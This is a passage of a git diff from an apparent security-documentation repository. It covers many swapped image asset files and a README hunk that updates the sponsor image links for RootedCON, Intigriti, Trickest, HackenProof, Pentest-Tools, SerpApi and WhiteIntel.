index 6c314ff31..a4ed42fd6 100644
Binary files a/.gitbook/assets/image (873).png and b/.gitbook/assets/image (873).png differ
diff --git a/.gitbook/assets/image (874).png b/.gitbook/assets/image (874).png
index f716e189c..8eb902501 100644
Binary files a/.gitbook/assets/image (874).png and b/.gitbook/assets/image (874).png differ
diff --git a/.gitbook/assets/image (875).png b/.gitbook/assets/image (875).png
index c6e1bd7d5..c10b13489 100644
Binary files a/.gitbook/assets/image (875).png and b/.gitbook/assets/image (875).png differ
diff --git a/.gitbook/assets/image (876).png b/.gitbook/assets/image (876).png
index 7f601f09f..6c314ff31 100644
Binary files a/.gitbook/assets/image (876).png and b/.gitbook/assets/image (876).png differ
diff --git a/.gitbook/assets/image (877).png b/.gitbook/assets/image (877).png
index b42b37ed3..f716e189c 100644
Binary files a/.gitbook/assets/image (877).png and b/.gitbook/assets/image (877).png differ
diff --git a/.gitbook/assets/image (878).png b/.gitbook/assets/image (878).png
index 455fbb8b7..c6e1bd7d5 100644
Binary files a/.gitbook/assets/image (878).png and b/.gitbook/assets/image (878).png differ
diff --git a/.gitbook/assets/image (879).png b/.gitbook/assets/image (879).png
index 7510b6e7e..7f601f09f 100644
Binary files a/.gitbook/assets/image (879).png and b/.gitbook/assets/image (879).png differ
diff --git a/.gitbook/assets/image (88).png b/.gitbook/assets/image (88).png
index c70eb8753..5c863f6d1 100644
Binary files a/.gitbook/assets/image (88).png and b/.gitbook/assets/image (88).png differ
diff --git a/.gitbook/assets/image (880).png b/.gitbook/assets/image (880).png
index 877c67db1..b42b37ed3 100644
Binary files a/.gitbook/assets/image (880).png and b/.gitbook/assets/image (880).png differ
diff --git a/.gitbook/assets/image (881).png b/.gitbook/assets/image (881).png
index b892f104b..455fbb8b7 100644
Binary files a/.gitbook/assets/image (881).png and b/.gitbook/assets/image (881).png differ
diff --git a/.gitbook/assets/image (882).png b/.gitbook/assets/image (882).png
index 55ab26cc8..7510b6e7e 100644
Binary files a/.gitbook/assets/image (882).png and b/.gitbook/assets/image (882).png differ
diff --git a/.gitbook/assets/image (883).png b/.gitbook/assets/image (883).png
index add6a58e9..877c67db1 100644
Binary files a/.gitbook/assets/image (883).png and b/.gitbook/assets/image (883).png differ
diff --git a/.gitbook/assets/image (884).png b/.gitbook/assets/image (884).png
index 37acf9e4c..b892f104b 100644
Binary files a/.gitbook/assets/image (884).png and b/.gitbook/assets/image (884).png differ
diff --git a/.gitbook/assets/image (885).png b/.gitbook/assets/image (885).png
index 01191414e..55ab26cc8 100644
Binary files a/.gitbook/assets/image (885).png and b/.gitbook/assets/image (885).png differ
diff --git a/.gitbook/assets/image (886).png b/.gitbook/assets/image (886).png
index 128d84542..add6a58e9 100644
Binary files a/.gitbook/assets/image (886).png and b/.gitbook/assets/image (886).png differ
diff --git a/.gitbook/assets/image (887).png b/.gitbook/assets/image (887).png
index e88ab8866..37acf9e4c 100644
Binary files a/.gitbook/assets/image (887).png and b/.gitbook/assets/image (887).png differ
diff --git a/.gitbook/assets/image (888).png b/.gitbook/assets/image (888).png
index 743a0e187..01191414e 100644
Binary files a/.gitbook/assets/image (888).png and b/.gitbook/assets/image (888).png differ
diff --git a/.gitbook/assets/image (889).png b/.gitbook/assets/image (889).png
index 0f8af75bf..128d84542 100644
Binary files a/.gitbook/assets/image (889).png and b/.gitbook/assets/image (889).png differ
diff --git a/.gitbook/assets/image (89).png b/.gitbook/assets/image (89).png
index d56598b83..2758b36d6 100644
Binary files a/.gitbook/assets/image (89).png and b/.gitbook/assets/image (89).png differ
diff --git a/.gitbook/assets/image (890).png b/.gitbook/assets/image (890).png
index 4d6681deb..e88ab8866 100644
Binary files a/.gitbook/assets/image (890).png and b/.gitbook/assets/image (890).png differ
diff --git a/.gitbook/assets/image (891).png b/.gitbook/assets/image (891).png
index a452e6ad8..743a0e187 100644
Binary files a/.gitbook/assets/image (891).png and b/.gitbook/assets/image (891).png differ
diff --git a/.gitbook/assets/image (892).png b/.gitbook/assets/image (892).png
index 5d191ec02..0f8af75bf 100644
Binary files a/.gitbook/assets/image (892).png and b/.gitbook/assets/image (892).png differ
diff --git a/.gitbook/assets/image (893).png b/.gitbook/assets/image (893).png
index da99a7c62..4d6681deb 100644
Binary files a/.gitbook/assets/image (893).png and b/.gitbook/assets/image (893).png differ
diff --git a/.gitbook/assets/image (894).png b/.gitbook/assets/image (894).png
index f59a94966..a452e6ad8 100644
Binary files a/.gitbook/assets/image (894).png and b/.gitbook/assets/image (894).png differ
diff --git a/.gitbook/assets/image (895).png b/.gitbook/assets/image (895).png
index 8f1f2230b..5d191ec02 100644
Binary files a/.gitbook/assets/image (895).png and b/.gitbook/assets/image (895).png differ
diff --git a/.gitbook/assets/image (896).png b/.gitbook/assets/image (896).png
index b64184f9f..da99a7c62 100644
Binary files a/.gitbook/assets/image (896).png and b/.gitbook/assets/image (896).png differ
diff --git a/.gitbook/assets/image (897).png b/.gitbook/assets/image (897).png
index 0cadfb948..f59a94966 100644
Binary files a/.gitbook/assets/image (897).png and b/.gitbook/assets/image (897).png differ
diff --git a/.gitbook/assets/image (898).png b/.gitbook/assets/image (898).png
index 4bb5f2707..8f1f2230b 100644
Binary files a/.gitbook/assets/image (898).png and b/.gitbook/assets/image (898).png differ
diff --git a/.gitbook/assets/image (899).png b/.gitbook/assets/image (899).png
index d0ab0ee19..b64184f9f 100644
Binary files a/.gitbook/assets/image (899).png and b/.gitbook/assets/image (899).png differ
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png
index 1a985c3d4..2c0467343 100644
Binary files a/.gitbook/assets/image (9).png and b/.gitbook/assets/image (9).png differ
diff --git a/.gitbook/assets/image (90).png b/.gitbook/assets/image (90).png
index 530b24646..629c1147c 100644
Binary files a/.gitbook/assets/image (90).png and b/.gitbook/assets/image (90).png differ
diff --git a/.gitbook/assets/image (900).png b/.gitbook/assets/image (900).png
index 592a4e1a0..0cadfb948 100644
Binary files a/.gitbook/assets/image (900).png and b/.gitbook/assets/image (900).png differ
diff --git a/.gitbook/assets/image (901).png b/.gitbook/assets/image (901).png
index c90bad4be..4bb5f2707 100644
Binary files a/.gitbook/assets/image (901).png and b/.gitbook/assets/image (901).png differ
diff --git a/.gitbook/assets/image (902).png b/.gitbook/assets/image (902).png
index bbff6c5f4..d0ab0ee19 100644
Binary files a/.gitbook/assets/image (902).png and b/.gitbook/assets/image (902).png differ
diff --git a/.gitbook/assets/image (903).png b/.gitbook/assets/image (903).png
index 606702899..592a4e1a0 100644
Binary files a/.gitbook/assets/image (903).png and b/.gitbook/assets/image (903).png differ
diff --git a/.gitbook/assets/image (904).png b/.gitbook/assets/image (904).png
index 757655716..c90bad4be 100644
Binary files a/.gitbook/assets/image (904).png and b/.gitbook/assets/image (904).png differ
diff --git a/.gitbook/assets/image (905).png b/.gitbook/assets/image (905).png
index 5109dd9b3..bbff6c5f4 100644
Binary files a/.gitbook/assets/image (905).png and b/.gitbook/assets/image (905).png differ
diff --git a/.gitbook/assets/image (906).png b/.gitbook/assets/image (906).png
index 3733248ec..606702899 100644
Binary files a/.gitbook/assets/image (906).png and b/.gitbook/assets/image (906).png differ
diff --git a/.gitbook/assets/image (907).png b/.gitbook/assets/image (907).png
index e1f6894bd..757655716 100644
Binary files a/.gitbook/assets/image (907).png and b/.gitbook/assets/image (907).png differ
diff --git a/.gitbook/assets/image (908).png b/.gitbook/assets/image (908).png
index 1e2588800..5109dd9b3 100644
Binary files a/.gitbook/assets/image (908).png and b/.gitbook/assets/image (908).png differ
diff --git a/.gitbook/assets/image (909).png b/.gitbook/assets/image (909).png
index 9cc426fc7..3733248ec 100644
Binary files a/.gitbook/assets/image (909).png and b/.gitbook/assets/image (909).png differ
diff --git a/.gitbook/assets/image (91).png b/.gitbook/assets/image (91).png
index 8fd9221ae..c70eb8753 100644
Binary files a/.gitbook/assets/image (91).png and b/.gitbook/assets/image (91).png differ
diff --git a/.gitbook/assets/image (910).png b/.gitbook/assets/image (910).png
index 13d44115a..e1f6894bd 100644
Binary files a/.gitbook/assets/image (910).png and b/.gitbook/assets/image (910).png differ
diff --git a/.gitbook/assets/image (911).png b/.gitbook/assets/image (911).png
index 3ec420eb9..1e2588800 100644
Binary files a/.gitbook/assets/image (911).png and b/.gitbook/assets/image (911).png differ
diff --git a/.gitbook/assets/image (912).png b/.gitbook/assets/image (912).png
index 3305c8600..9cc426fc7 100644
Binary files a/.gitbook/assets/image (912).png and b/.gitbook/assets/image (912).png differ
diff --git a/.gitbook/assets/image (913).png b/.gitbook/assets/image (913).png
index 261b7c009..13d44115a 100644
Binary files a/.gitbook/assets/image (913).png and b/.gitbook/assets/image (913).png differ
diff --git a/.gitbook/assets/image (914).png b/.gitbook/assets/image (914).png
index ed2eac533..3ec420eb9 100644
Binary files a/.gitbook/assets/image (914).png and b/.gitbook/assets/image (914).png differ
diff --git a/.gitbook/assets/image (915).png b/.gitbook/assets/image (915).png
index d15c166d5..3305c8600 100644
Binary files a/.gitbook/assets/image (915).png and b/.gitbook/assets/image (915).png differ
diff --git a/.gitbook/assets/image (916).png b/.gitbook/assets/image (916).png
index 5d2bec98a..261b7c009 100644
Binary files a/.gitbook/assets/image (916).png and b/.gitbook/assets/image (916).png differ
diff --git a/.gitbook/assets/image (917).png b/.gitbook/assets/image (917).png
index 4d56204f7..ed2eac533 100644
Binary files a/.gitbook/assets/image (917).png and b/.gitbook/assets/image (917).png differ
diff --git a/.gitbook/assets/image (918).png b/.gitbook/assets/image (918).png
index 07983c822..d15c166d5 100644
Binary files a/.gitbook/assets/image (918).png and b/.gitbook/assets/image (918).png differ
diff --git a/.gitbook/assets/image (919).png b/.gitbook/assets/image (919).png
index f99d130d7..5d2bec98a 100644
Binary files a/.gitbook/assets/image (919).png and b/.gitbook/assets/image (919).png differ
diff --git a/.gitbook/assets/image (92).png b/.gitbook/assets/image (92).png
index c17689b99..d56598b83 100644
Binary files a/.gitbook/assets/image (92).png and b/.gitbook/assets/image (92).png differ
diff --git a/.gitbook/assets/image (920).png b/.gitbook/assets/image (920).png
index bda84db54..4d56204f7 100644
Binary files a/.gitbook/assets/image (920).png and b/.gitbook/assets/image (920).png differ
diff --git a/.gitbook/assets/image (921).png b/.gitbook/assets/image (921).png
index 357f8f6e1..07983c822 100644
Binary files a/.gitbook/assets/image (921).png and b/.gitbook/assets/image (921).png differ
diff --git a/.gitbook/assets/image (922).png b/.gitbook/assets/image (922).png
index 84884c474..f99d130d7 100644
Binary files a/.gitbook/assets/image (922).png and b/.gitbook/assets/image (922).png differ
diff --git a/.gitbook/assets/image (923).png b/.gitbook/assets/image (923).png
index 5895dc2dd..bda84db54 100644
Binary files a/.gitbook/assets/image (923).png and b/.gitbook/assets/image (923).png differ
diff --git a/.gitbook/assets/image (924).png b/.gitbook/assets/image (924).png
index 17aedd90c..357f8f6e1 100644
Binary files a/.gitbook/assets/image (924).png and b/.gitbook/assets/image (924).png differ
diff --git a/.gitbook/assets/image (925).png b/.gitbook/assets/image (925).png
index 816c11115..84884c474 100644
Binary files a/.gitbook/assets/image (925).png and b/.gitbook/assets/image (925).png differ
diff --git a/.gitbook/assets/image (926).png b/.gitbook/assets/image (926).png
index 1978dd558..5895dc2dd 100644
Binary files a/.gitbook/assets/image (926).png and b/.gitbook/assets/image (926).png differ
diff --git a/.gitbook/assets/image (927).png b/.gitbook/assets/image (927).png
index af5dbbe3d..17aedd90c 100644
Binary files a/.gitbook/assets/image (927).png and b/.gitbook/assets/image (927).png differ
diff --git a/.gitbook/assets/image (928).png b/.gitbook/assets/image (928).png
index 831449f43..816c11115 100644
Binary files a/.gitbook/assets/image (928).png and b/.gitbook/assets/image (928).png differ
diff --git a/.gitbook/assets/image (929).png b/.gitbook/assets/image (929).png
index b9465118c..1978dd558 100644
Binary files a/.gitbook/assets/image (929).png and b/.gitbook/assets/image (929).png differ
diff --git a/.gitbook/assets/image (93).png b/.gitbook/assets/image (93).png
index 9c566b1b7..530b24646 100644
Binary files a/.gitbook/assets/image (93).png and b/.gitbook/assets/image (93).png differ
diff --git a/.gitbook/assets/image (930).png b/.gitbook/assets/image (930).png
index ad1f05669..af5dbbe3d 100644
Binary files a/.gitbook/assets/image (930).png and b/.gitbook/assets/image (930).png differ
diff --git a/.gitbook/assets/image (931).png b/.gitbook/assets/image (931).png
index 06900bd58..831449f43 100644
Binary files a/.gitbook/assets/image (931).png and b/.gitbook/assets/image (931).png differ
diff --git a/.gitbook/assets/image (932).png b/.gitbook/assets/image (932).png
index b95243241..b9465118c 100644
Binary files a/.gitbook/assets/image (932).png and b/.gitbook/assets/image (932).png differ
diff --git a/.gitbook/assets/image (933).png b/.gitbook/assets/image (933).png
index 15dc4be80..ad1f05669 100644
Binary files a/.gitbook/assets/image (933).png and b/.gitbook/assets/image (933).png differ
diff --git a/.gitbook/assets/image (934).png b/.gitbook/assets/image (934).png
index eb57ea914..06900bd58 100644
Binary files a/.gitbook/assets/image (934).png and b/.gitbook/assets/image (934).png differ
diff --git a/.gitbook/assets/image (935).png b/.gitbook/assets/image (935).png
index 0f8a86733..b95243241 100644
Binary files a/.gitbook/assets/image (935).png and b/.gitbook/assets/image (935).png differ
diff --git a/.gitbook/assets/image (936).png b/.gitbook/assets/image (936).png
index 0ac7ed6c9..15dc4be80 100644
Binary files a/.gitbook/assets/image (936).png and b/.gitbook/assets/image (936).png differ
diff --git a/.gitbook/assets/image (937).png b/.gitbook/assets/image (937).png
index 37ab1a51d..eb57ea914 100644
Binary files a/.gitbook/assets/image (937).png and b/.gitbook/assets/image (937).png differ
diff --git a/.gitbook/assets/image (938).png b/.gitbook/assets/image (938).png
index ec4d7c9ff..0f8a86733 100644
Binary files a/.gitbook/assets/image (938).png and b/.gitbook/assets/image (938).png differ
diff --git a/.gitbook/assets/image (939).png b/.gitbook/assets/image (939).png
index d979f9cf7..0ac7ed6c9 100644
Binary files a/.gitbook/assets/image (939).png and b/.gitbook/assets/image (939).png differ
diff --git a/.gitbook/assets/image (94).png b/.gitbook/assets/image (94).png
index 5dc69a4e7..8fd9221ae 100644
Binary files a/.gitbook/assets/image (94).png and b/.gitbook/assets/image (94).png differ
diff --git a/.gitbook/assets/image (940).png b/.gitbook/assets/image (940).png
index ffd8adf04..37ab1a51d 100644
Binary files a/.gitbook/assets/image (940).png and b/.gitbook/assets/image (940).png differ
diff --git a/.gitbook/assets/image (941).png b/.gitbook/assets/image (941).png
index 383a5938f..ec4d7c9ff 100644
Binary files a/.gitbook/assets/image (941).png and b/.gitbook/assets/image (941).png differ
diff --git a/.gitbook/assets/image (942).png b/.gitbook/assets/image (942).png
index c0008cb7b..d979f9cf7 100644
Binary files a/.gitbook/assets/image (942).png and b/.gitbook/assets/image (942).png differ
diff --git a/.gitbook/assets/image (943).png b/.gitbook/assets/image (943).png
index 811b2066d..ffd8adf04 100644
Binary files a/.gitbook/assets/image (943).png and b/.gitbook/assets/image (943).png differ
diff --git a/.gitbook/assets/image (944).png b/.gitbook/assets/image (944).png
index 22eebd987..383a5938f 100644
Binary files a/.gitbook/assets/image (944).png and b/.gitbook/assets/image (944).png differ
diff --git a/.gitbook/assets/image (945).png b/.gitbook/assets/image (945).png
index 8a4bb9a4a..c0008cb7b 100644
Binary files a/.gitbook/assets/image (945).png and b/.gitbook/assets/image (945).png differ
diff --git a/.gitbook/assets/image (946).png b/.gitbook/assets/image (946).png
index 5ffa89035..811b2066d 100644
Binary files a/.gitbook/assets/image (946).png and b/.gitbook/assets/image (946).png differ
diff --git a/.gitbook/assets/image (947).png b/.gitbook/assets/image (947).png
index a4059618a..22eebd987 100644
Binary files a/.gitbook/assets/image (947).png and b/.gitbook/assets/image (947).png differ
diff --git a/.gitbook/assets/image (948).png b/.gitbook/assets/image (948).png
index f1359eecf..8a4bb9a4a 100644
Binary files a/.gitbook/assets/image (948).png and b/.gitbook/assets/image (948).png differ
diff --git a/.gitbook/assets/image (949).png b/.gitbook/assets/image (949).png
index 722af5f5c..5ffa89035 100644
Binary files a/.gitbook/assets/image (949).png and b/.gitbook/assets/image (949).png differ
diff --git a/.gitbook/assets/image (95).png b/.gitbook/assets/image (95).png
index 33653dcb1..c17689b99 100644
Binary files a/.gitbook/assets/image (95).png and b/.gitbook/assets/image (95).png differ
diff --git a/.gitbook/assets/image (950).png b/.gitbook/assets/image (950).png
index 58a0172e5..a4059618a 100644
Binary files a/.gitbook/assets/image (950).png and b/.gitbook/assets/image (950).png differ
diff --git a/.gitbook/assets/image (951).png b/.gitbook/assets/image (951).png
index 347f7abbb..f1359eecf 100644
Binary files a/.gitbook/assets/image (951).png and b/.gitbook/assets/image (951).png differ
diff --git a/.gitbook/assets/image (952).png b/.gitbook/assets/image (952).png
index 474931f56..722af5f5c 100644
Binary files a/.gitbook/assets/image (952).png and b/.gitbook/assets/image (952).png differ
diff --git a/.gitbook/assets/image (953).png b/.gitbook/assets/image (953).png
index 8c39d83aa..58a0172e5 100644
Binary files a/.gitbook/assets/image (953).png and b/.gitbook/assets/image (953).png differ
diff --git a/.gitbook/assets/image (954).png b/.gitbook/assets/image (954).png
index 9f0290b72..347f7abbb 100644
Binary files a/.gitbook/assets/image (954).png and b/.gitbook/assets/image (954).png differ
diff --git a/.gitbook/assets/image (955).png b/.gitbook/assets/image (955).png
index 3f805b3ce..474931f56 100644
Binary files a/.gitbook/assets/image (955).png and b/.gitbook/assets/image (955).png differ
diff --git a/.gitbook/assets/image (956).png b/.gitbook/assets/image (956).png
index addb8bdde..8c39d83aa 100644
Binary files a/.gitbook/assets/image (956).png and b/.gitbook/assets/image (956).png differ
diff --git a/.gitbook/assets/image (957).png b/.gitbook/assets/image (957).png
index 226538de2..9f0290b72 100644
Binary files a/.gitbook/assets/image (957).png and b/.gitbook/assets/image (957).png differ
diff --git a/.gitbook/assets/image (958).png b/.gitbook/assets/image (958).png
index 84874207b..3f805b3ce 100644
Binary files a/.gitbook/assets/image (958).png and b/.gitbook/assets/image (958).png differ
diff --git a/.gitbook/assets/image (959).png b/.gitbook/assets/image (959).png
index c4b1b5d48..addb8bdde 100644
Binary files a/.gitbook/assets/image (959).png and b/.gitbook/assets/image (959).png differ
diff --git a/.gitbook/assets/image (96).png b/.gitbook/assets/image (96).png
index 1f3811eca..9c566b1b7 100644
Binary files a/.gitbook/assets/image (96).png and b/.gitbook/assets/image (96).png differ
diff --git a/.gitbook/assets/image (960).png b/.gitbook/assets/image (960).png
index 24c2844c3..226538de2 100644
Binary files a/.gitbook/assets/image (960).png and b/.gitbook/assets/image (960).png differ
diff --git a/.gitbook/assets/image (961).png b/.gitbook/assets/image (961).png
index ee9f710d4..84874207b 100644
Binary files a/.gitbook/assets/image (961).png and b/.gitbook/assets/image (961).png differ
diff --git a/.gitbook/assets/image (962).png b/.gitbook/assets/image (962).png
index 2528d1e23..c4b1b5d48 100644
Binary files a/.gitbook/assets/image (962).png and b/.gitbook/assets/image (962).png differ
diff --git a/.gitbook/assets/image (963).png b/.gitbook/assets/image (963).png
index 16db588fc..24c2844c3 100644
Binary files a/.gitbook/assets/image (963).png and b/.gitbook/assets/image (963).png differ
diff --git a/.gitbook/assets/image (964).png b/.gitbook/assets/image (964).png
index 1f7dea20a..ee9f710d4 100644
Binary files a/.gitbook/assets/image (964).png and b/.gitbook/assets/image (964).png differ
diff --git a/.gitbook/assets/image (965).png b/.gitbook/assets/image (965).png
index 674171522..2528d1e23 100644
Binary files a/.gitbook/assets/image (965).png and b/.gitbook/assets/image (965).png differ
diff --git a/.gitbook/assets/image (966).png b/.gitbook/assets/image (966).png
index cfef5b39f..16db588fc 100644
Binary files a/.gitbook/assets/image (966).png and b/.gitbook/assets/image (966).png differ
diff --git a/.gitbook/assets/image (967).png b/.gitbook/assets/image (967).png
index 07aa1e747..1f7dea20a 100644
Binary files a/.gitbook/assets/image (967).png and b/.gitbook/assets/image (967).png differ
diff --git a/.gitbook/assets/image (968).png b/.gitbook/assets/image (968).png
index 6ee1afc03..674171522 100644
Binary files a/.gitbook/assets/image (968).png and b/.gitbook/assets/image (968).png differ
diff --git a/.gitbook/assets/image (969).png b/.gitbook/assets/image (969).png
index 1defaaff1..cfef5b39f 100644
Binary files a/.gitbook/assets/image (969).png and b/.gitbook/assets/image (969).png differ
diff --git a/.gitbook/assets/image (97).png b/.gitbook/assets/image (97).png
index 2fde683ec..5dc69a4e7 100644
Binary files a/.gitbook/assets/image (97).png and b/.gitbook/assets/image (97).png differ
diff --git a/.gitbook/assets/image (970).png b/.gitbook/assets/image (970).png
index 35ddb985b..07aa1e747 100644
Binary files a/.gitbook/assets/image (970).png and b/.gitbook/assets/image (970).png differ
diff --git a/.gitbook/assets/image (971).png b/.gitbook/assets/image (971).png
index c072058b6..6ee1afc03 100644
Binary files a/.gitbook/assets/image (971).png and b/.gitbook/assets/image (971).png differ
diff --git a/.gitbook/assets/image (972).png b/.gitbook/assets/image (972).png
index 90dd85e30..1defaaff1 100644
Binary files a/.gitbook/assets/image (972).png and b/.gitbook/assets/image (972).png differ
diff --git a/.gitbook/assets/image (973).png b/.gitbook/assets/image (973).png
index 4f2c9b758..35ddb985b 100644
Binary files a/.gitbook/assets/image (973).png and b/.gitbook/assets/image (973).png differ
diff --git a/.gitbook/assets/image (974).png b/.gitbook/assets/image (974).png
index d6a565eb6..c072058b6 100644
Binary files a/.gitbook/assets/image (974).png and b/.gitbook/assets/image (974).png differ
diff --git a/.gitbook/assets/image (975).png b/.gitbook/assets/image (975).png
index 7ebf7f05b..90dd85e30 100644
Binary files a/.gitbook/assets/image (975).png and b/.gitbook/assets/image (975).png differ
diff --git a/.gitbook/assets/image (976).png b/.gitbook/assets/image (976).png
index 4d79f5764..4f2c9b758 100644
Binary files a/.gitbook/assets/image (976).png and b/.gitbook/assets/image (976).png differ
diff --git a/.gitbook/assets/image (977).png b/.gitbook/assets/image (977).png
index 3269b7f67..d6a565eb6 100644
Binary files a/.gitbook/assets/image (977).png and b/.gitbook/assets/image (977).png differ
diff --git a/.gitbook/assets/image (978).png b/.gitbook/assets/image (978).png
index 9d8662682..7ebf7f05b 100644
Binary files a/.gitbook/assets/image (978).png and b/.gitbook/assets/image (978).png differ
diff --git a/.gitbook/assets/image (979).png b/.gitbook/assets/image (979).png
index 13f03d4b7..4d79f5764 100644
Binary files a/.gitbook/assets/image (979).png and b/.gitbook/assets/image (979).png differ
diff --git a/.gitbook/assets/image (98).png b/.gitbook/assets/image (98).png
index 53a923405..33653dcb1 100644
Binary files a/.gitbook/assets/image (98).png and b/.gitbook/assets/image (98).png differ
diff --git a/.gitbook/assets/image (980).png b/.gitbook/assets/image (980).png
index ffea8afba..3269b7f67 100644
Binary files a/.gitbook/assets/image (980).png and b/.gitbook/assets/image (980).png differ
diff --git a/.gitbook/assets/image (981).png b/.gitbook/assets/image (981).png
index e34331290..9d8662682 100644
Binary files a/.gitbook/assets/image (981).png and b/.gitbook/assets/image (981).png differ
diff --git a/.gitbook/assets/image (982).png b/.gitbook/assets/image (982).png
index c4bf20c0f..13f03d4b7 100644
Binary files a/.gitbook/assets/image (982).png and b/.gitbook/assets/image (982).png differ
diff --git a/.gitbook/assets/image (983).png b/.gitbook/assets/image (983).png
index 9026552a7..ffea8afba 100644
Binary files a/.gitbook/assets/image (983).png and b/.gitbook/assets/image (983).png differ
diff --git a/.gitbook/assets/image (984).png b/.gitbook/assets/image (984).png
index 597457563..e34331290 100644
Binary files a/.gitbook/assets/image (984).png and b/.gitbook/assets/image (984).png differ
diff --git a/.gitbook/assets/image (985).png b/.gitbook/assets/image (985).png
index d504c55ec..c4bf20c0f 100644
Binary files a/.gitbook/assets/image (985).png and b/.gitbook/assets/image (985).png differ
diff --git a/.gitbook/assets/image (986).png b/.gitbook/assets/image (986).png
index ab5d833dc..9026552a7 100644
Binary files a/.gitbook/assets/image (986).png and b/.gitbook/assets/image (986).png differ
diff --git a/.gitbook/assets/image (987).png b/.gitbook/assets/image (987).png
index 97522921c..597457563 100644
Binary files a/.gitbook/assets/image (987).png and b/.gitbook/assets/image (987).png differ
diff --git a/.gitbook/assets/image (988).png b/.gitbook/assets/image (988).png
index 1065c7b82..d504c55ec 100644
Binary files a/.gitbook/assets/image (988).png and b/.gitbook/assets/image (988).png differ
diff --git a/.gitbook/assets/image (989).png b/.gitbook/assets/image (989).png
index e73c84494..ab5d833dc 100644
Binary files a/.gitbook/assets/image (989).png and b/.gitbook/assets/image (989).png differ
diff --git a/.gitbook/assets/image (99).png b/.gitbook/assets/image (99).png
index 8b7813787..1f3811eca 100644
Binary files a/.gitbook/assets/image (99).png and b/.gitbook/assets/image (99).png differ
diff --git a/.gitbook/assets/image (990).png b/.gitbook/assets/image (990).png
index 422cbdc04..97522921c 100644
Binary files a/.gitbook/assets/image (990).png and b/.gitbook/assets/image (990).png differ
diff --git a/.gitbook/assets/image (991).png b/.gitbook/assets/image (991).png
index f33c3c9b5..1065c7b82 100644
Binary files a/.gitbook/assets/image (991).png and b/.gitbook/assets/image (991).png differ
diff --git a/.gitbook/assets/image (992).png b/.gitbook/assets/image (992).png
index 77284ef32..e73c84494 100644
Binary files a/.gitbook/assets/image (992).png and b/.gitbook/assets/image (992).png differ
diff --git a/.gitbook/assets/image (993).png b/.gitbook/assets/image (993).png
index ca3f3bb95..422cbdc04 100644
Binary files a/.gitbook/assets/image (993).png and b/.gitbook/assets/image (993).png differ
diff --git a/.gitbook/assets/image (994).png b/.gitbook/assets/image (994).png
index 2eafdd175..f33c3c9b5 100644
Binary files a/.gitbook/assets/image (994).png and b/.gitbook/assets/image (994).png differ
diff --git a/.gitbook/assets/image (995).png b/.gitbook/assets/image (995).png
index 49dbc7536..77284ef32 100644
Binary files a/.gitbook/assets/image (995).png and b/.gitbook/assets/image (995).png differ
diff --git a/.gitbook/assets/image (996).png b/.gitbook/assets/image (996).png
index 47a9e657a..ca3f3bb95 100644
Binary files a/.gitbook/assets/image (996).png and b/.gitbook/assets/image (996).png differ
diff --git a/.gitbook/assets/image (997).png b/.gitbook/assets/image (997).png
index 8275bf4e1..2eafdd175 100644
Binary files a/.gitbook/assets/image (997).png and b/.gitbook/assets/image (997).png differ
diff --git a/.gitbook/assets/image (998).png b/.gitbook/assets/image (998).png
index 088cfb275..49dbc7536 100644
Binary files a/.gitbook/assets/image (998).png and b/.gitbook/assets/image (998).png differ
diff --git a/.gitbook/assets/image (999).png b/.gitbook/assets/image (999).png
index e146bcdd2..47a9e657a 100644
Binary files a/.gitbook/assets/image (999).png and b/.gitbook/assets/image (999).png differ
diff --git a/README.md b/README.md
index a58071968..771bbe95f 100644
--- a/README.md
+++ b/README.md
@@ -30,7 +30,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 ### [RootedCON](https://www.rootedcon.com/)
 
-<figure><img src=".gitbook/assets/image (42).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
 
 [**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
 
@@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 ### [Intigriti](https://www.intigriti.com)
 
-<figure><img src=".gitbook/assets/image (44).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (47).png" alt=""><figcaption></figcaption></figure>
 
 **Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
 
@@ -52,7 +52,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 ### [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)
 
-<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
 Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
@@ -65,7 +65,7 @@ Get Access Today:
 
 ### [HACKENPROOF](https://bit.ly/3xrrDrL)
 
-<figure><img src=".gitbook/assets/image (47).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (50).png" alt=""><figcaption></figcaption></figure>
 
 Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
 
@@ -79,7 +79,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 ### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
 
-<figure><img src=".gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
 
 **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
 
@@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
 
 ### [SerpApi](https://serpapi.com/)
 
-<figure><img src=".gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
 
 SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
 
@@ -126,7 +126,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
 
 ### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
